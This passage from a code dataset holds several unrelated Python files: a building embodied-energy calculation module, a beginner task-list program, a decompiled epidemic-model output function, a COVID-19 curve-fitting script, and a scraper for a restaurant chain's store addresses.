\"Estimation of base-values for grey energy, primary energy, global\n warming potential (GWP 100A) and Umweltbelastungspunkte (UBP 2006) for Swiss constructions from before 1920\n until today.\" CUI 2014.\n\n\n Files read / written from InputLocator:\n\n get_building_architecture\n get_building_occupancy\n get_building_age\n get_zone_geometry\n get_archetypes_embodied_energy\n get_archetypes_embodied_emissions\n\n path_LCA_embodied_energy:\n path to database of archetypes embodied energy file\n Archetypes_embodied_energy.csv\n path_LCA_embodied_emissions:\n path to database of archetypes grey emissions file\n Archetypes_embodied_emissions.csv\n path_age_shp: string\n path to building_age.shp\n path_occupancy_shp:\n path to building_occupancyshp\n path_geometry_shp:\n path to building_geometrys.hp\n path_architecture_shp:\n path to building_architecture.shp\n path_results : string\n path to demand results folder emissions\n \"\"\"\n\n # local variables\n architecture_df = dbf_to_dataframe(locator.get_building_architecture())\n prop_occupancy_df = dbf_to_dataframe(locator.get_building_occupancy())\n occupancy_df = pd.DataFrame(prop_occupancy_df.loc[:, (prop_occupancy_df != 0).any(axis=0)])\n age_df = dbf_to_dataframe(locator.get_building_age())\n geometry_df = Gdf.from_file(locator.get_zone_geometry())\n geometry_df['footprint'] = geometry_df.area\n geometry_df['perimeter'] = geometry_df.length\n geometry_df = geometry_df.drop('geometry', axis=1)\n\n # get list of uses\n list_uses = list(occupancy_df.drop({'Name'}, axis=1).columns)\n\n # define main use:\n occupancy_df['mainuse'] = calc_mainuse(occupancy_df, list_uses)\n\n # DataFrame with joined data for all categories\n cat_df = occupancy_df.merge(age_df, on='Name').merge(geometry_df, on='Name').merge(architecture_df, on='Name')\n\n # calculate building geometry\n ## total window area\n\n average_wwr = [np.mean([a,b,c,d]) for a,b,c,d in zip(cat_df['wwr_south'],cat_df['wwr_north'],cat_df['wwr_west'],cat_df['wwr_east'])]\n cat_df['windows_ag'] = average_wwr * cat_df['perimeter'] * (cat_df['height_ag'] * (1-cat_df['void_deck']))\n ## wall area above ground\n cat_df['area_walls_ext_ag'] = cat_df['perimeter'] * (cat_df['height_ag'] * (1-cat_df['void_deck'])) - cat_df['windows_ag']\n ## wall area below ground\n cat_df['area_walls_ext_bg'] = cat_df['perimeter'] * cat_df['height_bg']\n ## floor area above ground\n cat_df['floor_area_ag'] = cat_df['footprint'] * cat_df['floors_ag']\n ## floor area below ground\n cat_df['floor_area_bg'] = cat_df['footprint'] * cat_df['floors_bg']\n ## total floor area\n cat_df['total_area'] = cat_df['floor_area_ag'] + cat_df['floor_area_bg']\n\n # get categories for each year of construction/retrofit\n ## each building component gets categorized according to its occupancy type, construction year and retrofit year\n ## e.g., for an office building built in 1975, cat_df['cat_built'] = 'OFFICE3'\n ## e.g., for an office building with windows renovated in 1975, cat_df['cat_windows'] = 'OFFICE9'\n\n\n # calculate contributions to embodied energy and emissions\n ## calculated by multiplying the area of the given component by the energy and emissions per square meter for the\n ## given category according to the data in the archetype database\n result_energy = calculate_contributions('EMBODIED_ENERGY', cat_df, config, gv, locator, year_to_calculate,\n total_column='GEN_GJ', specific_column='GEN_MJm2')\n result_emissions = calculate_contributions('EMBODIED_EMISSIONS', cat_df, config, gv, locator, year_to_calculate,\n 
total_column='CO2_ton', specific_column='CO2_kgm2')\n\n # export the results for embodied emissions (E_ghg_) and non-renewable primary energy (E_nre_pen_) for each\n # building, both total (in t CO2-eq. and GJ) and per square meter (in kg CO2-eq./m2 and MJ/m2)\n fields_to_plot = ['Name', 'GFA_m2', 'E_nre_pen_GJ', 'E_nre_pen_MJm2', 'E_ghg_ton', 'E_ghg_kgm2']\n pd.DataFrame(\n {'Name': result_energy.Name, 'E_nre_pen_GJ': result_energy.GEN_GJ, 'E_nre_pen_MJm2': result_energy.GEN_MJm2,\n 'E_ghg_ton': result_emissions.CO2_ton, 'E_ghg_kgm2': result_emissions.CO2_kgm2,\n 'GFA_m2': result_energy.total_area}).to_csv(locator.get_lca_embodied(),\n columns=fields_to_plot, index=False, float_format='%.2f')\n print('done!')\n\n\ndef calculate_contributions(archetype, cat_df, config, gv, locator, year_to_calculate, total_column, specific_column):\n \"\"\"\n Calculate the embodied energy/emissions for each building based on their construction year, and the area and \n renovation year of each building component.\n\n :param archetype: String that defines whether the 'EMBODIED_ENERGY' or 'EMBODIED_EMISSIONS' are being calculated.\n :type archetype: str\n :param cat_df: DataFrame with joined data of all categories for each building, that is: occupancy, age, geometry,\n architecture, building component area, construction category and renovation category for each building component\n :type cat_df: DataFrame\n :param gv: an instance of GlobalVariables with the constants to be used (like `list_uses` etc.)\n :type gv: GlobalVariables\n :param locator: an InputLocator instance set to the scenario to work on\n :type locator: InputLocator\n :param year_to_calculate: year in which the calculation is done; since the embodied energy and emissions are\n calculated over 60 years, if the year of calculation is more than 60 years after construction, the results\n will be 0\n :type year_to_calculate: int\n :param total_column: label for the column with the total results (e.g., 'GEN_GJ')\n :type total_column: str\n :param specific_column: label for the column with the results per square meter (e.g., 'GEN_MJm2')\n :type specific_column: str\n\n :return result: DataFrame with the calculation results (i.e., the total and specific embodied energy or emisisons\n for each building)\n :rtype result: DataFrame\n \"\"\"\n # get archetype properties from the database\n database_df = pd.read_excel(locator.get_life_cycle_inventory_building_systems(config.region), archetype)\n database_df['Code'] = database_df.apply(lambda x: calc_code(x['building_use'], x['year_start'],\n x['year_end'], x['standard']), axis=1)\n\n cat_df['cat_built'] = calc_category(database_df, cat_df, 'built', 'C')\n\n retro_cat = ['envelope', 'roof', 'windows', 'partitions', 'basement', 'HVAC']\n for cat in retro_cat:\n cat_df['cat_' + cat] = calc_category(database_df, cat_df, cat, 'R')\n\n # merge databases according to category\n built_df = cat_df.merge(database_df, left_on='cat_built', right_on='Code')\n envelope_df = cat_df.merge(database_df, left_on='cat_envelope', right_on='Code')\n roof_df = cat_df.merge(database_df, left_on='cat_roof', right_on='Code')\n windows_df = cat_df.merge(database_df, left_on='cat_windows', right_on='Code')\n partitions_df = cat_df.merge(database_df, left_on='cat_partitions', right_on='Code')\n basement_df = cat_df.merge(database_df, left_on='cat_basement', right_on='Code')\n HVAC_df = cat_df.merge(database_df, left_on='cat_HVAC', right_on='Code')\n\n #do checkup in case some buildings or all buildings do not have a match.\n #this 
happens when building has not been retrofitted.\n\n \n # calculate the embodied energy/emissions due to construction\n # these include: external walls, roof, windows, interior floors, partitions, HVAC systems, and excavation\n ## calculate how many years before the calculation year the building was built in\n built_df['delta_year'] = year_to_calculate - built_df['built']\n ## if it was built more than 60 years before, the embodied energy/emissions have been \"paid off\" and are set to 0\n built_df['confirm'] = built_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n ## if it was built less than 60 years before, the contribution from each building component is calculated\n built_df['contrib'] = (((built_df['Wall_ext_ag'] * built_df['area_walls_ext_ag']) +\n (built_df['Roof'] * built_df['footprint']) +\n (built_df['windows_ag'] * built_df['Win_ext']) +\n (built_df['floor_area_ag'] * built_df['Floor_int'] +\n built_df['floor_area_ag'] * built_df['Wall_int_sup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO +\n built_df['footprint'] * built_df['Wall_int_nosup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO) +\n (basement_df['footprint'] * basement_df['Floor_g'] +\n basement_df['Wall_ext_bg'] * basement_df['area_walls_ext_bg']) +\n (built_df['footprint'] * built_df['Excavation'])) / SERVICE_LIFE_OF_BUILDINGS +\n ((HVAC_df['floor_area_ag'] + HVAC_df['footprint']) * HVAC_df[\n 'Services']) / SERVICE_LIFE_OF_TECHNICAL_SYSTEMS) * built_df['confirm']\n \n # calculate the embodied energy/emissions due to retrofits\n # if a component was retrofitted more than 60 years before, its contribution has been \"paid off\" and is set to 0\n ## contributions due to envelope retrofit\n envelope_df['delta_year'] = year_to_calculate - envelope_df['envelope']\n envelope_df['confirm'] = envelope_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n envelope_df['contrib'] = (envelope_df['Wall_ext_ag'] * envelope_df['area_walls_ext_ag']) * envelope_df[\n 'confirm'] / (SERVICE_LIFE_OF_BUILDINGS)\n ## contributions due to roof retrofit\n roof_df['delta_year'] = year_to_calculate - roof_df['roof']\n roof_df['confirm'] = roof_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n roof_df['contrib'] = roof_df['Roof'] * roof_df['footprint'] * roof_df['confirm'] / SERVICE_LIFE_OF_BUILDINGS\n ## contributions due to windows retrofit\n windows_df['delta_year'] = year_to_calculate - windows_df['windows']\n windows_df['confirm'] = windows_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n windows_df['contrib'] = windows_df['windows_ag'] * windows_df['Win_ext'] * windows_df[\n 'confirm'] / SERVICE_LIFE_OF_BUILDINGS\n ## contributions due to partitions retrofit\n partitions_df['delta_year'] = year_to_calculate - partitions_df['partitions']\n partitions_df['confirm'] = partitions_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS),\n axis=1)\n partitions_df['contrib'] = (partitions_df['floor_area_ag'] * partitions_df['Floor_int'] +\n partitions_df['floor_area_ag'] * partitions_df['Wall_int_sup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO +\n partitions_df['footprint'] * partitions_df['Wall_int_nosup'] * CONVERSION_AREA_TO_FLOOR_AREA_RATIO) * \\\n partitions_df['confirm'] / SERVICE_LIFE_OF_BUILDINGS\n ## contributions due to basement_df\n basement_df['delta_year'] = year_to_calculate - basement_df['basement']\n basement_df['confirm'] = basement_df.apply(lambda x: 
calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_BUILDINGS), axis=1)\n basement_df['contrib'] = ((basement_df['footprint'] * basement_df['Floor_g'] +\n basement_df['Wall_ext_bg'] * basement_df['area_walls_ext_bg'])\n * basement_df['confirm'] / SERVICE_LIFE_OF_BUILDINGS)\n ## contributions due to HVAC_df\n HVAC_df['delta_year'] = year_to_calculate - HVAC_df['HVAC']\n HVAC_df['confirm'] = HVAC_df.apply(lambda x: calc_if_existing(x['delta_year'], SERVICE_LIFE_OF_TECHNICAL_SYSTEMS), axis=1)\n HVAC_df['contrib'] = ((HVAC_df['floor_area_ag'] + HVAC_df['footprint']) * HVAC_df['Services']) * HVAC_df[\n 'confirm'] / SERVICE_LIFE_OF_TECHNICAL_SYSTEMS\n\n # the total embodied energy/emissions are calculated as a sum of the contributions from construction and retrofits\n built_df[total_column] = (HVAC_df['contrib'] + basement_df['contrib'] + partitions_df['contrib']\n + built_df['contrib'] + roof_df['contrib'] + envelope_df['contrib']\n + windows_df['contrib']) / 1000\n built_df[specific_column] = built_df[total_column] * 1000 / built_df['total_area']\n\n # the total and specific embodied energy/emissions are returned \n result = built_df[['Name', total_column, specific_column, 'total_area']]\n\n return result\n\ndef calc_if_existing(x, y):\n \"\"\"\n Function to verify if one value is greater than or equal to another (then return 1) or not (return 0). This is used\n to verify whether a building's construction or retrofits happened more than 60 years before the year to calculate.\n Since the embodied energy and emissions are calculated over 60 years, if the year of calculation is more than 60 \n years after construction, the results will be 0.\n \n :param x: Number of years since construction/retrofit\n :type x: long\n :param y: Number of years over which the embodied energy/emissions calculation is carried out (i.e., 60)\n :type y: int\n\n :return value: 1 if x <= y; 0 otherwise\n :rtype value: int\n\n \"\"\"\n\n if x <= y:\n return 1\n else:\n return 0\n\ndef calc_code(code1, code2, code3, code4):\n return str(code1) + str(code2) + str(code3) + str(code4)\n\n\ndef main(config):\n assert os.path.exists(config.scenario), 'Scenario not found: %s' % config.scenario\n locator = cea.inputlocator.InputLocator(scenario=config.scenario)\n\n print('Running embodied-energy with scenario = %s' % config.scenario)\n print('Running embodied-energy with year-to-calculate = %s' % config.emissions.year_to_calculate)\n\n lca_embodied(locator=locator, year_to_calculate=config.emissions.year_to_calculate, config=config,\n gv=cea.globalvar.GlobalVariables())\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())\n","sub_path":"cea/analysis/lca/embodied.py","file_name":"embodied.py","file_ext":"py","file_size_in_byte":17371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"521863211","text":"# Create a task list. A user is presented with the text below.\n#Congratulations! You're running [YOUR NAME]'s Task List program.\n\n# What would you like to do next?\n# 1. List all tasks.\n# 2. Add a task to the list.\n# 3. Delete a task.\n# 0. To quit the program\n\n# Let them select an option to list all of their tasks, add a task to their list, delete a task, or quit the program.\n# Make each option a different function in your program.\n# Do NOT use Google. Do NOT use other students. Try to do this on your own.\n #Extra Credit. Save the user's list in a text file. 
When the program is run again,\n# input that text file so their task list is not lost.\n\n\n\ntaskList=[\"sweep the floor\",\"clean the bathroom\",\"do the laundry\",\"cut the grass\"]\n\ndef listAlltasksfunc():\n for i in taskList:\n print(i)\ndef addToList(newtask):\n taskList.append(newtask) # add newtask to tasklist\ndef deleteTask(taskTodelete):\n taskList.remove(taskTodelete) # remove instead of pop\n\n\nmenu = -1\nwhile menu != 4:\n menu = int(input('What would you like to do next \\n'\n '1. List all tasks \\n'\n '2. Add a task to the list \\n'\n '3. Delete a task. \\n'\n '4. To quit the program'))\n if menu == 1:\n print('The task List is:')\n listAlltasksfunc()\n\n if menu == 2:\n taskNew= input('Add to the task list here: ')\n f = open(\"file.txt\",\"a\") # opens file > file name> a for append\n f.write(taskNew) # writes file\n f.close()\n addToList(taskNew) # adds to task to original list\n if menu == 3:\n removeTask=input('what task would you like to delete ? ')\n deleteTask(removeTask)","sub_path":"Dekevion.py","file_name":"Dekevion.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"467545104","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/runner/runners/2.169.1/work/MetaWards/MetaWards/tests/../build/lib.macosx-10.14-x86_64-3.7/metawards/extractors/_output_trajectory.py\n# Compiled at: 2020-05-11 13:26:49\n# Size of source mod 2**32: 1569 bytes\nfrom typing import Union as _Union\nfrom .._network import Network\nfrom .._networks import Networks\nfrom .._population import Populations\nfrom .._outputfiles import OutputFiles\n__all__ = [\n 'output_trajectory']\n\ndef output_trajectory(network: _Union[(Network, Networks)], output_dir: OutputFiles, trajectory: Populations, **kwargs) -> None:\n \"\"\"Call in the \"finalise\" stage to output the\n population trajectory to the 'trajectory.csv' file\n \"\"\"\n RESULTS = output_dir.open('trajectory.csv')\n has_date = trajectory[0].date\n if has_date:\n datestring = 'date,'\n else:\n datestring = ''\n RESULTS.write(f\"day,{datestring}demographic,S,E,I,R,IW\\n\")\n for i, pop in enumerate(trajectory):\n if pop.date:\n d = pop.date.isoformat() + ','\n else:\n d = ''\n RESULTS.write(f\"{pop.day},{d}overall,{pop.susceptibles},{pop.latent},{pop.total},{pop.recovereds},{pop.n_inf_wards}\\n\")\n if isinstance(network, Networks):\n for i, demographic in enumerate(network.demographics):\n subpop = pop.subpops[i]\n name = demographic.name\n if not name is None:\n if len(name) == 0:\n name = str(i)\n RESULTS.write(f\"{subpop.day},{d}{name},{subpop.susceptibles},{subpop.latent},{subpop.total},{subpop.recovereds},{subpop.n_inf_wards}\\n\")","sub_path":"pycfiles/metawards-0.11.2-cp37-cp37m-macosx_10_14_x86_64/_output_trajectory.cpython-37.py","file_name":"_output_trajectory.cpython-37.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"346392261","text":"#include package\nimport numpy as np\nfrom scipy.integrate import odeint\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\n#pandasでCSVデータ読む。\ndata = pd.read_csv('COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\ndata_r = 
pd.read_csv('COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv')\ndata_d = pd.read_csv('COVID-19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv')\n\n \nconfirmed = [0] * (len(data.columns) - 4)\nday_confirmed = [0] * (len(data.columns) - 4)\nconfirmed_r = [0] * (len(data_r.columns) - 4)\nday_confirmed_r = [0] * (len(data.columns) - 4)\nconfirmed_d = [0] * (len(data_d.columns) - 4)\ndiff_confirmed = [0] * (len(data.columns) - 4)\ndays_from_22_Jan_20 = np.arange(0, len(data.columns) - 4, 1)\ndays_from_22_Jan_20_ = np.arange(0, len(data.columns) - 4, 1)\nbeta_ = [0] * (len(data_r.columns) - 4)\ngamma_ = [0] * (len(data_d.columns) - 4)\n\n\ncity = \"Japan\"\n#city =\"world\"\n#city = \"Germany\"\n#city = \"Italy\"\n#city = \"Spain\"\n#city = \"United Kingdom\"\n#city =\"US\"\n#city = \"Iran\"\n#city = \"Switzerland\"\n#city =\"Sweden\"\n#city = \"France\"\n#city = \"Hong Kong\"\n#city = \"Beijing\"\n#city = \"Taiwan*\"\n#city = \"Hubei\"\ncity = \"Korea, South\"\ncity = \"India\"\n\nskd=5 #2 #1 #4 #3 #2 #slopes average factor\n#データを加工する\nt_cases = 0\nt_recover = 0\nt_deaths = 0\nfor i in range(0, len(data_r), 1):\n if (data_r.iloc[i][1] == city): #for country/region\n #if (data_r.iloc[i][0] == city): #for province:/state \n print(str(data_r.iloc[i][0]) + \" of \" + data_r.iloc[i][1])\n for day in range(4, len(data.columns), 1): \n confirmed_r[day - 4] += data_r.iloc[i][day]\n if day < 4+skd:\n day_confirmed_r[day-4] += data_r.iloc[i][day]\n else:\n day_confirmed_r[day-4] += (data_r.iloc[i][day] - data_r.iloc[i][day-skd])/(skd)\n t_recover += data_r.iloc[i][day] \nfor i in range(0, len(data_d), 1):\n if (data_d.iloc[i][1] == city): #for country/region\n #if (data_d.iloc[i][0] == city): #for province:/state \n print(str(data_d.iloc[i][0]) + \" of \" + data_d.iloc[i][1])\n for day in range(4, len(data.columns), 1):\n confirmed_d[day - 4] += data_d.iloc[i][day] #fro drawings\n t_deaths += data_d.iloc[i][day] \nfor i in range(0, len(data), 1):\n if (data.iloc[i][1] == city): #for country/region\n #if (data.iloc[i][0] == city): #for province:/state \n print(str(data.iloc[i][0]) + \" of \" + data.iloc[i][1])\n for day in range(4, len(data.columns), 1):\n confirmed[day - 4] += data.iloc[i][day] - confirmed_r[day - 4] -confirmed_d[day-4]\n diff_confirmed[day - 4] += confirmed[day-4] / (confirmed_r[day - 4]+confirmed_d[day-4])\n if day == 4:\n day_confirmed[day-4] += data.iloc[i][day]\n else:\n day_confirmed[day-4] += data.iloc[i][day] - data.iloc[i][day-1]\n\ntl_confirmed = 0\ndlog_confirmed = [0] * (len(data.columns) - 4)\ndlog_confirmed[0]=np.log(confirmed[0])\ndlog_confirmed[1]=np.log(confirmed[1])-np.log(confirmed[0])\nratio_confirmed = [0] * (len(data.columns) - 4)\nratio_confirmed[0]=np.log(confirmed[0])\nratio_confirmed[1]=(confirmed[1]-confirmed[0]) #/(confirmed[0])\nratio_confirmed[2]=(confirmed[2]-confirmed[0])/2 #/(confirmed[0])/2\n\nfor i in range(skd, len(confirmed), 1): \n if confirmed[i] > 0: \n gamma_[i]=day_confirmed_r[i]/confirmed[i]\n else:\n continue\ntl_confirmed = confirmed[len(confirmed)-1] + confirmed_r[len(confirmed)-1] + confirmed_d[len(confirmed)-1]\nt_cases = tl_confirmed\n\nt_max=len(confirmed)\ndt=1\nt=np.arange(0,t_max,dt)\nt1=t\n\nobs_i = confirmed_r\n#function which estimate i from seir model func \ndef estimate_i(ini_state,r0,a):\n est = r0*np.exp(a*t+0*t)\n return est\n\ndef y(params):\n est_i=estimate_i(ini_state,params[0],params[1])\n return np.sum((est_i-obs_i)*(est_i-obs_i))\n\ndef 
estimate_j(ini_state,r0,alpha):\n est = r0+alpha*(t)\n return est\n\ndef yj(params):\n est_i=estimate_j(ini_state,params[0],params[1])\n return np.sum((est_i-obs_i)*(est_i-obs_i))\n\nr0=1\na = 1\n\nini_state=[4.34379478e+03, 3.64147576e-02]\n#optimize logscale likelihood function\nmnmz=minimize(y,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0,a = mnmz.x[0],mnmz.x[1] #,mnmz.x[2]\nest=estimate_i(ini_state,r0,a)\n\nt=np.arange(63,t_max,dt)\nt2=t\nobs_i = confirmed[63:]\nr0_=1\nalpha_ = 1\nini_state=[5.70579672, 0.00755685]\n#optimize logscale likelihood function\nmnmz=minimize(y,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0_,alpha_ = mnmz.x[0],mnmz.x[1]\n#est_confirmed=estimate_i(ini_state,r0_,alpha_)\n#t=np.arange(63,100,dt)\nt3=t\nest_confirmed=estimate_i(ini_state,r0_,alpha_)\n\ndiff_est=[0] * (len(data.columns) - 4)\ngamma_est=[0] * (len(data.columns) - 4)\nR_est = [0] * (len(data_d.columns) - 4)\nR_0 = [0] * (len(data_d.columns) - 4)\nC = [0] * (len(data_d.columns) - 4)\nfor i in range(1,t_max):\n diff_est[i]=est[i]-est[i-1]\nfor i in range(0, len(confirmed), 1): \n if confirmed[i] > 0 and diff_est[i] > 0: \n gamma_est[i]=diff_est[i]/confirmed[i]\n R_est[i]= 1+day_confirmed[i]/diff_est[i] # diff_est=gamma*confirmed\n #R_0[i]= R_est[i]/(1-gamma_est[i]*R_est[i]*confirmed[i]*i/t_cases)\n C[i]=gamma_est[i]*(R_est[i]-1)\n else:\n continue\n\n#matplotlib描画\nfig, (ax1,ax2) = plt.subplots(2,1,figsize=(1.6180 * 4, 4*2))\n#ax3 = ax1.twinx()\nax4 = ax2.twinx()\n\nlns1=ax1.semilogy(days_from_22_Jan_20, confirmed, \"o-\", color=\"red\",label = \"cases\")\nlns8=ax1.semilogy(t3, est_confirmed, \"-\", color=\"black\",label = \"cases_r0_={:.2f}alpha_={:.2e}\".format(r0_,alpha_))\nlns2=ax1.semilogy(days_from_22_Jan_20, confirmed_r, \"*-\", color=\"green\",label = \"recovered+deaths\")\n#lns4=ax2.plot(days_from_22_Jan_20_, dlog_confirmed, \"o-\", color=\"blue\",label = \"dlog_confirmed\")\n#lns3=ax4.plot(days_from_22_Jan_20_, gamma_, \"o-\", color=\"black\", zorder=1,label = \"gamma\")\nlns3=ax4.plot(days_from_22_Jan_20_, gamma_est, \"o-\", color=\"black\", zorder=1,label = \"gamma_est\")\n#lns4=ax2.bar(days_from_22_Jan_20_, day_confirmed, zorder=2, label = \"day_confirmed\")\nlns4=ax2.plot(days_from_22_Jan_20_, R_est, \"o-\", color=\"blue\",label = \"R_est\")\nlns5=ax1.semilogy(days_from_22_Jan_20_, diff_confirmed, \".-\", color=\"black\",label = \"I/(R+D)\")\nlns6=ax1.semilogy(t1, est,\"-\", color=\"black\", zorder=1, label = \"est_r0={:.2f}alpha={:.2e}\".format(r0,a))\nlns7=ax2.plot(t1, diff_est,\"-\", color=\"black\", zorder=1, label = \"diff_est_r0={:.2f}alpha={:.2e}\".format(r0,a))\nlns9=ax2.bar(days_from_22_Jan_20_, day_confirmed_r, label = \"day_confirmed_r\")\n#lns10=ax2.plot(days_from_22_Jan_20_, R_0, \"o-\", color=\"red\",label = \"R_0\")\nlns4=ax2.plot(days_from_22_Jan_20_, C, \"o-\", color=\"red\",label = \"gamma*(R-1)\")\n\nlns_ax1 = lns1 +lns2 +lns5 + lns6 +lns8\nlabs_ax1 = [l.get_label() for l in lns_ax1]\nax1.legend(lns_ax1, labs_ax1, loc=0)\n\nlns_ax2 = lns3 #+lns9\nlabs_ax2 = [l.get_label() for l in lns_ax2]\nax4.legend(lns_ax2, labs_ax2, loc=0)\nax2.legend(loc=2)\n\nax1.set_title(city +\" ; {} cases, {} recovered, {} deaths\".format(t_cases,t_recover,t_deaths))\nax1.set_xlabel(\"days from 22, Jan, 2020\")\nax1.set_ylabel(\"casas, recovered \")\n#ax2.set_ylabel(\"dlog_confirmed\")\nax4.set_ylabel(\"gamma\")\nax2.set_ylabel(\"day_confirmed_r, R\")\nax4.set_ylim(0,0.04)\n#ax2.set_ylim(0,40)\nax2.set_yscale('log')\n#ax4.set_yscale('log')\n\n#ax3.set_ylabel(\"deaths 
\")\n#ax4.set_ylabel(\"deaths_rate %\")\n#ax4.set_ylim(-0.5,0.5)\nax1.grid()\nax2.grid()\n\nplt.pause(1)\n#city = \"Tiwan\"\nplt.savefig('./fig/removed_{}_gamma_R_{}.png'.format(city,skd)) \nplt.close() \n\nt=np.arange(63,t_max,dt)\nt4=t\nobs_i = C[63:]\nr0_=1\nalpha_ = 1\nini_state=[1, 1]\n#optimize logscale likelihood function\nmnmz=minimize(yj,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0_,alpha_ = mnmz.x[0],mnmz.x[1]\n#t4=t\nest_C = estimate_j(ini_state,r0_,alpha_)\n\nt=np.arange(63,100,dt)\nt4=t\nest_C=estimate_j(ini_state,r0_,alpha_)\n\n#matplotlib描画\nfig, ax4 = plt.subplots(1,1,figsize=(1.6180 * 4, 4*1))\n\nlns10=ax4.plot(days_from_22_Jan_20_, C, \"o-\", color=\"blue\",label = \"gamma*(R-1)\")\nlns11=ax4.plot(t4, est_C, \".-\", color=\"black\",label = \"est_gamma*(R-1)\")\nax4.legend(loc=2)\n\nax4.set_title(city +\" ; {} cases, {} recovered, {} deaths\".format(t_cases,t_recover,t_deaths))\nax4.set_xlabel(\"days from 22, Jan, 2020\")\nax4.set_ylabel(\"gamma*(R-1) \")\nax4.set_ylim(0,0.4)\n\nax4.grid()\n\nplt.pause(1)\nplt.savefig('./fig/removed_{}_gammaR_{}.png'.format(city,skd)) \nplt.close() \n\nt=np.arange(63,t_max,dt)\nt2=t\nobs_i = confirmed[63:]\nr0_=1\nalpha_ = 1\nini_state=[5.70579672, 0.00755685]\n#optimize logscale likelihood function\nmnmz=minimize(y,ini_state,method=\"nelder-mead\")\nprint(mnmz)\nr0_,alpha_ = mnmz.x[0],mnmz.x[1]\n#est_confirmed=estimate_i(ini_state,r0_,alpha_)\n#t=np.arange(63,100,dt)\nt3=t\nest_confirmed=estimate_i(ini_state,r0_,alpha_)\n\nt=np.arange(63,100,dt)\nt3=t\nest_confirmed=estimate_i(ini_state,r0_,alpha_)\n\n#matplotlib描画\nfig, ax3 = plt.subplots(1,1,figsize=(1.6180 * 4, 4*1))\n\nlns1=ax3.semilogy(days_from_22_Jan_20, confirmed, \"o-\", color=\"red\",label = \"cases\")\nlns8=ax3.semilogy(t3, est_confirmed, \"-\", color=\"black\",label = \"cases_r0_={:.2f}alpha_={:.2e}\".format(r0_,alpha_))\nlns2=ax3.semilogy(days_from_22_Jan_20, confirmed_r, \"*-\", color=\"green\",label = \"recovered+deaths\")\nlns5=ax3.semilogy(days_from_22_Jan_20_, diff_confirmed, \".-\", color=\"black\",label = \"I/(R+D)\")\nlns6=ax3.semilogy(t1, est,\"-\", color=\"black\", zorder=1, label = \"est_r0={:.2f}alpha={:.2e}\".format(r0,a))\n\nlns_ax1 = lns1 +lns2 +lns5 + lns6 +lns8\nlabs_ax1 = [l.get_label() for l in lns_ax1]\nax3.legend(lns_ax1, labs_ax1, loc=0)\n\nax3.set_title(city +\" ; {} cases, {} recovered, {} deaths\".format(t_cases,t_recover,t_deaths))\nax3.set_xlabel(\"days from 22, Jan, 2020\")\nax3.set_ylabel(\"casas, recovered \")\nax3.grid()\n\nplt.pause(1)\nplt.savefig('./fig/exterpolate_{}_gamma_R_{}.png'.format(city,skd)) \nplt.close() \n\n","sub_path":"fitting_gamma_R.py","file_name":"fitting_gamma_R.py","file_ext":"py","file_size_in_byte":9949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54067799","text":"import pandas as pd\r\nimport urllib.request\r\nimport datetime\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\nfrom itertools import count\r\n\r\nresult = []\r\nmyColumns = ('store', 'sido', 'gungu','address')\r\nmyencoding = 'utf-8'\r\n\r\ndef get_request_url(url):\r\n req = urllib.request.Request(url)\r\n\r\n try:\r\n response = urllib.request.urlopen(req)\r\n if response.getcode() == 200:\r\n print (\"[%s] Url Request Success\" % datetime.datetime.now())\r\n return response.read().decode('utf-8')\r\n except Exception as e:\r\n return None\r\n\r\ndef getKyochonAddress():\r\n for sido1 in range(1,18):\r\n for sido2 in count():\r\n url = 'http://www.kyochon.com/shop/domestic.asp'\r\n url += 
'?txt_search='\r\n url += '&sido1=%s' %str(sido1)\r\n url += '&sido2=%s' %str(sido2 +1)\r\n\r\n mydata = get_request_url(url)\r\n if(mydata == None):\r\n break\r\n soup = BeautifulSoup(mydata, 'html.parser')\r\n ultag = soup.find('ul', attrs={'class':'list'})\r\n\r\n for myitem in ultag.findAll('a', href=True):\r\n store = myitem.find('dt').get_text()\r\n address = myitem.find('dd').get_text()\r\n address = address.strip().split('\\r')[0]\r\n\r\n imsi = address.split(' ')\r\n sido = imsi[0]\r\n gungu = imsi[1]\r\n\r\n sublist = []\r\n sublist.append(store)\r\n sublist.append(sido)\r\n sublist.append(gungu)\r\n sublist.append(address)\r\n\r\n result.append(sublist)\r\n\r\nprint('kyochon 매장 크롤링 시작')\r\ngetKyochonAddress()\r\ndata = pd.DataFrame(result, columns = myColumns)\r\ndata.to_csv('kyochon.csv', encoding = myencoding, mode = 'w', index=True )\r\nprint('kyochon 매장 크롤링 종료')\r\n","sub_path":"crawling/kyochon_scraping.py","file_name":"kyochon_scraping.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 